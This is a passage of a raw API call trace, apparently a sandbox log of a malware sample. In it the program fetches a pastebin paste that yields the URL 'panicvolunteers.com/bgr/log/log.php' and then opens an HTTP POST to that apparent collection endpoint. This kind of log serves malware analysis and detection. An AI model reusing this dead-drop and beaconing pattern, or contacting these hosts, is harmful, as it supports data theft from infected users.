(lpszAgent="Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.130 Safari/537.36", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0004 [0271.527] InternetSetOptionW (hInternet=0x0, dwOption=0x32, lpBuffer=0x8de970, dwBufferLength=0x8) returned 1 [0271.528] InternetQueryOptionW (in: hInternet=0x0, dwOption=0x26, lpBuffer=0x0, lpdwBufferLength=0x8de97c | out: lpBuffer=0x0, lpdwBufferLength=0x8de97c) returned 0 [0271.978] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0xc) returned 0xddaa08 [0271.978] InternetQueryOptionW (in: hInternet=0x0, dwOption=0x26, lpBuffer=0xddaa08, lpdwBufferLength=0x8de97c | out: lpBuffer=0xddaa08, lpdwBufferLength=0x8de97c) returned 1 [0271.979] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xddaa08 | out: hHeap=0xcc0000) returned 1 [0271.979] InternetConnectW (hInternet=0xcc0004, lpszServerName="pastebin.com", nServerPort=0x50, lpszUserName="", lpszPassword="", dwService=0x3, dwFlags=0x0, dwContext=0x0) returned 0xcc0008 [0271.981] HttpOpenRequestW (hConnect=0xcc0008, lpszVerb=0x0, lpszObjectName="/raw.php?i=7MDswaSn", lpszVersion=0x0, lpszReferrer=0x0, lplpszAcceptTypes=0x0, dwFlags=0x0, dwContext=0x0) returned 0xcc000c [0271.983] HttpSendRequestW (hRequest=0xcc000c, lpszHeaders=0x0, dwHeadersLength=0x0, lpOptional=0x0*, dwOptionalLength=0x0) returned 1 [0273.273] HttpQueryInfoW (in: hRequest=0xcc000c, dwInfoLevel=0x20000013, lpBuffer=0x8de930, lpdwBufferLength=0x8de928, lpdwIndex=0x8de92c*=0x0 | out: lpBuffer=0x8de930*, lpdwBufferLength=0x8de928*=0x4, lpdwIndex=0x8de92c*=0x0) returned 1 [0273.273] HttpQueryInfoW (in: hRequest=0xcc000c, dwInfoLevel=0x5, lpBuffer=0x8de94c, lpdwBufferLength=0x8de978, lpdwIndex=0x8de97c*=0x0 | out: lpBuffer=0x8de94c, lpdwBufferLength=0x8de978, lpdwIndex=0x8de97c*=0x0) returned 0 [0273.273] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr="", cchSrc=1, lpCharType=0x8de8b0 | out: lpCharType=0x8de8b0) returned 1 [0273.273] InternetQueryDataAvailable (hFile=0xcc000c, lpdwNumberOfBytesAvailable=0x8de92c, dwFlags=0x0, dwContext=0x0) returned 1 [0273.273] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x2b) returned 0xf39068 [0273.273] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0xf39068, dwNumberOfBytesToRead=0x2b, lpdwNumberOfBytesRead=0x8de930 | out: lpBuffer=0xf39068*, lpdwNumberOfBytesRead=0x8de930*=0x2b) returned 1 [0273.273] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x20) returned 0xee5d00 [0273.273] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xe858c0 [0273.273] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x2b) returned 0xf390a0 [0273.273] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0xf390a0, dwNumberOfBytesToRead=0x2b, lpdwNumberOfBytesRead=0x8de930 | out: lpBuffer=0xf390a0*, lpdwNumberOfBytesRead=0x8de930*=0x0) returned 1 [0273.274] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf390a0 | out: hHeap=0xcc0000) returned 1 [0273.274] InternetCloseHandle (hInternet=0xcc000c) returned 1 [0273.274] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xd0ffe0 | out: hHeap=0xcc0000) returned 1 [0273.274] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xd01a68 | out: hHeap=0xcc0000) returned 1 [0273.274] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xcff270 | out: hHeap=0xcc0000) returned 1 [0273.274] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xd01a78 | out: hHeap=0xcc0000) returned 1 [0273.274] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xcff248 | out: hHeap=0xcc0000) returned 1 [0273.274] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xd01a88 | out: hHeap=0xcc0000) returned 1 [0273.274] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xdda270 | out: hHeap=0xcc0000) returned 1 [0273.274] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xd01a98 | out: hHeap=0xcc0000) returned 1 [0273.274] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xdda258 | out: hHeap=0xcc0000) returned 1 [0273.274] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xd01aa8 | out: hHeap=0xcc0000) returned 1 [0273.274] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xcff1f8 | out: hHeap=0xcc0000) returned 1 [0273.274] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xd01ab8 | out: hHeap=0xcc0000) returned 1 [0273.274] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xdda2b8 | out: hHeap=0xcc0000) returned 1 [0273.274] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xd01ac8 | out: hHeap=0xcc0000) returned 1 [0273.274] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xd01ac8 [0273.274] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x2b) returned 0xd0ffe0 [0273.274] InternetCloseHandle (hInternet=0xcc0004) returned 1 [0273.274] InternetCloseHandle (hInternet=0xcc0008) returned 0 [0273.275] CloseHandle (hObject=0x0) returned 0 [0273.275] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf39068 | out: hHeap=0xcc0000) returned 1 [0273.275] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xe858c0 | out: hHeap=0xcc0000) returned 1 [0273.275] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xee5d00 | out: hHeap=0xcc0000) returned 1 [0273.275] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xdda2a0 | out: hHeap=0xcc0000) returned 1 [0273.275] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xd01ae8 | out: hHeap=0xcc0000) returned 1 [0273.275] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xd439e8 | out: hHeap=0xcc0000) returned 1 [0273.275] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xd01af8 | out: hHeap=0xcc0000) returned 1 [0273.275] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xd43938 | out: hHeap=0xcc0000) returned 1 [0273.275] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xd01ad8 | out: hHeap=0xcc0000) returned 1 [0273.275] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xdda318 | out: hHeap=0xcc0000) returned 1 [0273.275] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xdda300 | out: hHeap=0xcc0000) returned 1 [0273.275] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xcfe528 | out: hHeap=0xcc0000) returned 1 [0273.275] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xd01b08 | out: hHeap=0xcc0000) returned 1 [0273.275] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x2c) returned 0xf39068 [0273.275] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x4) returned 0xd01b08 [0273.275] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x58) returned 0xe9d528 [0273.275] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x4) returned 0xd01ad8 [0273.275] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0xf39068, cbMultiByte=44, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 44 [0273.275] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x58) returned 0xe9d5e8 [0273.275] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0xf39068, cbMultiByte=44, lpWideCharStr=0xe9d5e8, cchWideChar=44 | out: lpWideCharStr="https://panicvolunteers.com/bgr/log/log.php") returned 44 [0273.275] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xe9d5e8 | out: hHeap=0xcc0000) returned 1 [0273.275] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xdda300 [0273.275] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf39068 | out: hHeap=0xcc0000) returned 1 [0273.275] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xd01b08 | out: hHeap=0xcc0000) returned 1 [0273.275] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xd0ffe0 | out: hHeap=0xcc0000) returned 1 [0273.276] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xd01ac8 | out: hHeap=0xcc0000) returned 1 [0273.276] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xdda360 | out: hHeap=0xcc0000) returned 1 [0273.276] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xcfe500 | out: hHeap=0xcc0000) returned 1 [0273.276] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xd01b18 | out: hHeap=0xcc0000) returned 1 [0273.276] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x20) returned 0xcfe500 [0273.276] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xdda360 [0273.276] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x4) returned 0xd01b18 [0273.276] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xdda318 [0273.276] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xdda2a0 [0273.276] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xdda300 | out: hHeap=0xcc0000) returned 1 [0273.276] PeekMessageW (in: lpMsg=0x8defdc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8defdc) returned 1 [0273.276] TranslateMessage (lpMsg=0x8defdc) returned 0 [0273.276] DispatchMessageW (lpMsg=0x8defdc) returned 0x0 [0273.276] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x20a) returned 0xd07158 [0273.276] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x4) returned 0xd01ac8 [0273.276] Shell_NotifyIconW (dwMessage=0x1, lpData=0x8de678) returned 1 [0273.277] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xd07158 | out: hHeap=0xcc0000) returned 1 [0273.277] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xd01ac8 | out: hHeap=0xcc0000) returned 1 [0273.277] KillTimer (hWnd=0xb016c, uIDEvent=0x1) returned 1 [0273.277] SetTimer (hWnd=0xb016c, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0273.277] PeekMessageW (in: lpMsg=0x8defdc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8defdc) returned 0 [0273.277] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xd01ac8 [0273.277] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xd01b08 [0273.277] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x20a) returned 0xd07158 [0273.277] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x4) returned 0xd01af8 [0273.277] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xd07158 | out: hHeap=0xcc0000) returned 1 [0273.277] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xd01af8 | out: hHeap=0xcc0000) returned 1 [0273.277] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xd01b08 | out: hHeap=0xcc0000) returned 1 [0273.277] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xd01ac8 | out: hHeap=0xcc0000) returned 1 [0273.277] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x38) returned 0xd13890 [0273.277] PeekMessageW (in: lpMsg=0x8defdc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8defdc) returned 0 [0273.277] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xd01ac8 [0273.277] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xdda300 [0273.277] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xd01ac8 | out: hHeap=0xcc0000) returned 1 [0273.277] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xddaa38 [0273.277] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xdda300 | out: hHeap=0xcc0000) returned 1 [0273.277] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xd13890 | out: hHeap=0xcc0000) returned 1 [0273.277] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xdda300 [0273.278] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xddaa38 | out: hHeap=0xcc0000) returned 1 [0273.278] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xcfb318 | out: hHeap=0xcc0000) returned 1 [0273.278] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xdda2e8 | out: hHeap=0xcc0000) returned 1 [0273.278] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xdda348 | out: hHeap=0xcc0000) returned 1 [0273.278] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xdda330 | out: hHeap=0xcc0000) returned 1 [0273.278] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xce50e0 | out: hHeap=0xcc0000) returned 1 [0273.278] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xcfe4d8 | out: hHeap=0xcc0000) returned 1 [0273.278] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xdda2a0 | out: hHeap=0xcc0000) returned 1 [0273.278] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xdda318 | out: hHeap=0xcc0000) returned 1 [0273.278] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xdda360 | out: hHeap=0xcc0000) returned 1 [0273.278] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xd01b18 | out: hHeap=0xcc0000) returned 1 [0273.278] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xcfe500 | out: hHeap=0xcc0000) returned 1 [0273.278] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xdda378 | out: hHeap=0xcc0000) returned 1 [0273.278] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xd01b28 | out: hHeap=0xcc0000) returned 1 [0273.278] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xdda378 [0273.278] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xdda360 [0273.278] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xd01b28 [0273.278] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xdda300 | out: hHeap=0xcc0000) returned 1 [0273.278] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xd01b28 | out: hHeap=0xcc0000) returned 1 [0273.278] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xdda300 [0273.278] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xdda450 | out: hHeap=0xcc0000) returned 1 [0273.278] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xdda4c8 | out: hHeap=0xcc0000) returned 1 [0273.278] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xdda468 | out: hHeap=0xcc0000) returned 1 [0273.278] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xdda408 | out: hHeap=0xcc0000) returned 1 [0273.278] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xdda480 | out: hHeap=0xcc0000) returned 1 [0273.279] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xdda420 | out: hHeap=0xcc0000) returned 1 [0273.279] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xdda438 | out: hHeap=0xcc0000) returned 1 [0273.279] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xdda3c0 | out: hHeap=0xcc0000) returned 1 [0273.279] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xdda3d8 | out: hHeap=0xcc0000) returned 1 [0273.279] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xdda3f0 | out: hHeap=0xcc0000) returned 1 [0273.279] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xcfe488 | out: hHeap=0xcc0000) returned 1 [0273.279] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xdda3f0 [0273.279] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x4) returned 0xd01b28 [0273.279] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x18) returned 0xde67a0 [0273.279] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0xa) returned 0xdda3d8 [0273.279] WinHttpRequest:IDispatch:GetIDsOfNames (in: This=0xd0dc30, riid=0x322c2c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x8df1b8*="Open", cNames=0x1, lcid=0x800, rgDispId=0x8df2bc | out: rgDispId=0x8df2bc*=1) returned 0x0 [0273.279] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xdda3d8 | out: hHeap=0xcc0000) returned 1 [0273.279] WinHttpRequest:IDispatch:GetTypeInfo (in: This=0xd0dc30, iTInfo=0x0, lcid=0x800, ppTInfo=0x8df1b0 | out: ppTInfo=0x8df1b0*=0xe99284) returned 0x0 [0273.289] ITypeInfo:RemoteGetTypeAttr (in: This=0xe99284, ppTypeAttr=0x8df1a8, pDummy=0x356310 | out: ppTypeAttr=0x8df1a8, pDummy=0x356310*=0x3225e4) returned 0x0 [0273.289] ITypeInfo:LocalGetIDsOfNames (This=0xe99284) returned 0x0 [0273.289] ITypeInfo:RemoteGetFuncDesc (in: This=0xe99284, index=0x0, ppFuncDesc=0x8df1ac, pDummy=0x356310 | out: ppFuncDesc=0x8df1ac, pDummy=0x356310*=0x3225e4) returned 0x0 [0273.293] ITypeInfo:LocalReleaseFuncDesc (This=0xe99284) returned 0xd25ef8 [0273.293] ITypeInfo:RemoteGetFuncDesc (in: This=0xe99284, index=0x1, ppFuncDesc=0x8df1ac, pDummy=0x356310 | out: ppFuncDesc=0x8df1ac, pDummy=0x356310*=0x3225e4) returned 0x0 [0273.293] ITypeInfo:LocalReleaseFuncDesc (This=0xe99284) returned 0xcfb318 [0273.293] ITypeInfo:RemoteGetFuncDesc (in: This=0xe99284, index=0x2, ppFuncDesc=0x8df1ac, pDummy=0x356310 | out: ppFuncDesc=0x8df1ac, pDummy=0x356310*=0x3225e4) returned 0x0 [0273.293] ITypeInfo:LocalReleaseFuncDesc (This=0xe99284) returned 0xcfb318 [0273.293] ITypeInfo:RemoteGetFuncDesc (in: This=0xe99284, index=0x3, ppFuncDesc=0x8df1ac, pDummy=0x356310 | out: ppFuncDesc=0x8df1ac, pDummy=0x356310*=0x3225e4) returned 0x0 [0273.293] ITypeInfo:LocalReleaseFuncDesc (This=0xe99284) returned 0xd25ef8 [0273.293] ITypeInfo:RemoteGetFuncDesc (in: This=0xe99284, index=0x4, ppFuncDesc=0x8df1ac, pDummy=0x356310 | out: ppFuncDesc=0x8df1ac, pDummy=0x356310*=0x3225e4) returned 0x0 [0273.293] ITypeInfo:LocalReleaseFuncDesc (This=0xe99284) returned 0xd25ef8 [0273.293] ITypeInfo:RemoteGetFuncDesc (in: This=0xe99284, index=0x5, ppFuncDesc=0x8df1ac, pDummy=0x356310 | out: ppFuncDesc=0x8df1ac, pDummy=0x356310*=0x3225e4) returned 0x0 [0273.293] ITypeInfo:LocalReleaseFuncDesc (This=0xe99284) returned 0xec0498 [0273.293] ITypeInfo:RemoteGetFuncDesc (in: This=0xe99284, index=0x6, ppFuncDesc=0x8df1ac, pDummy=0x356310 | out: ppFuncDesc=0x8df1ac, pDummy=0x356310*=0x3225e4) returned 0x0 [0273.293] ITypeInfo:LocalReleaseFuncDesc (This=0xe99284) returned 0xed2170 [0273.293] ITypeInfo:RemoteGetFuncDesc (in: This=0xe99284, index=0x7, ppFuncDesc=0x8df1ac, pDummy=0x356310 | out: ppFuncDesc=0x8df1ac, pDummy=0x356310*=0x3225e4) returned 0x0 [0273.293] ITypeInfo:LocalReleaseFuncDesc (This=0xe99284) returned 0xd25ef8 [0273.293] ITypeInfo:RemoteGetFuncDesc (in: This=0xe99284, index=0x8, ppFuncDesc=0x8df1ac, pDummy=0x356310 | out: ppFuncDesc=0x8df1ac, pDummy=0x356310*=0x3225e4) returned 0x0 [0273.293] ITypeInfo:LocalReleaseFuncDesc (This=0xe99284) returned 0xd25ef8 [0273.293] ITypeInfo:RemoteGetFuncDesc (in: This=0xe99284, index=0x9, ppFuncDesc=0x8df1ac, pDummy=0x356310 | out: ppFuncDesc=0x8df1ac, pDummy=0x356310*=0x3225e4) returned 0x0 [0273.293] ITypeInfo:LocalReleaseTypeAttr (This=0xe99284) returned 0xea8b78 [0273.293] ITypeInfo:LocalReleaseFuncDesc (This=0xe99284) returned 0xd25ef8 [0273.293] WinHttpRequest:IUnknown:Release (This=0xe99284) returned 0x1 [0273.293] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x44) returned 0xef4710 [0273.294] WinHttpRequest:IDispatch:Invoke (in: This=0xd0dc30, dispIdMember=1, riid=0x322c2c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x800, wFlags=0x1, pDispParams=0x8df2a0*(rgvarg=([0]=0xef4714*(varType=0xb, wReserved1=0x0, wReserved2=0x5efc, wReserved3=0xd2, varVal1=0x0, varVal2=0x0), [1]=0xef4724*(varType=0x8, wReserved1=0xee, wReserved2=0x0, wReserved3=0x0, varVal1="https://panicvolunteers.com/bgr/log/log.php", varVal2=0x0), [2]=0xef4734*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="POST", varVal2=0x0)), rgdispidNamedArgs=0x0, cArgs=0x3, cNamedArgs=0x0), pVarResult=0x0, pExcepInfo=0x8df268, puArgErr=0x8df2b0 | out: pDispParams=0x8df2a0*(rgvarg=([0]=0xef4714*(varType=0xb, wReserved1=0x0, wReserved2=0x5efc, wReserved3=0xd2, varVal1=0x0, varVal2=0x0), [1]=0xef4724*(varType=0x8, wReserved1=0xee, wReserved2=0x0, wReserved3=0x0, varVal1="https://panicvolunteers.com/bgr/log/log.php", varVal2=0x0), [2]=0xef4734*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="POST", varVal2=0x0)), rgdispidNamedArgs=0x0, cArgs=0x3, cNamedArgs=0x0), pVarResult=0x0, pExcepInfo=0x8df268*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x8df2b0*=0x2b5995) returned 0x0 [0273.298] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xde67a0 | out: hHeap=0xcc0000) returned 1 [0273.298] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xdda348 [0273.298] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xdda2e8 [0273.298] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x4) returned 0xd01a78 [0273.298] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xef4710 | out: hHeap=0xcc0000) returned 1 [0273.298] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xdda3f0 | out: hHeap=0xcc0000) returned 1 [0273.298] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xd01b28 | out: hHeap=0xcc0000) returned 1 [0273.298] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xdda3f0 [0273.298] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xdda348 | out: hHeap=0xcc0000) returned 1 [0273.298] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xdda510 | out: hHeap=0xcc0000) returned 1 [0273.298] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xd01b48 | out: hHeap=0xcc0000) returned 1 [0273.299] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xdda3a8 | out: hHeap=0xcc0000) returned 1 [0273.299] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xdda390 | out: hHeap=0xcc0000) returned 1 [0273.299] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xe9d528 | out: hHeap=0xcc0000) returned 1 [0273.299] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xd01ad8 | out: hHeap=0xcc0000) returned 1 [0273.299] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xdda360 | out: hHeap=0xcc0000) returned 1 [0273.299] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xdda378 | out: hHeap=0xcc0000) returned 1 [0273.299] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xdda300 | out: hHeap=0xcc0000) returned 1 [0273.299] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xcfe4b0 | out: hHeap=0xcc0000) returned 1 [0273.299] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xd01b58 | out: hHeap=0xcc0000) returned 1 [0273.299] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xdda2e8 | out: hHeap=0xcc0000) returned 1 [0273.299] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xd01a78 | out: hHeap=0xcc0000) returned 1 [0273.299] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xdda3f0 | out: hHeap=0xcc0000) returned 1 [0273.299] PeekMessageW (in: lpMsg=0x8df8ac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8df8ac) returned 0 [0273.299] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xd01a78 [0273.299] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xdda3f0 [0273.299] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x4) returned 0xd01b58 [0273.299] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xdda3f0 | out: hHeap=0xcc0000) returned 1 [0273.299] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x30) returned 0xf39068 [0273.299] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x20) returned 0xcfe4b0 [0273.299] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0xc) returned 0xdda3f0 [0273.299] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xdda2e8 [0273.299] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0xc) returned 0xdda300 [0273.299] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0xc) returned 0xdda378 [0273.299] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xdda360 [0273.300] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0xc) returned 0xdda390 [0273.300] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) 